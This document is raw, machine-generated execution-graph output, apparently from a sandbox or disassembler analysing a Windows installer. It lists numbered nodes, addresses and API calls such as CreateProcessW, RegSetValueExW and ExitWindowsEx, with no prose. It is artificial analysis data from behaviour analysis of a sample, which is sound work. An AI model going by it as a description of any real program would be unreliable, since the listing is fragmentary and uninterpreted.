                                                                                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 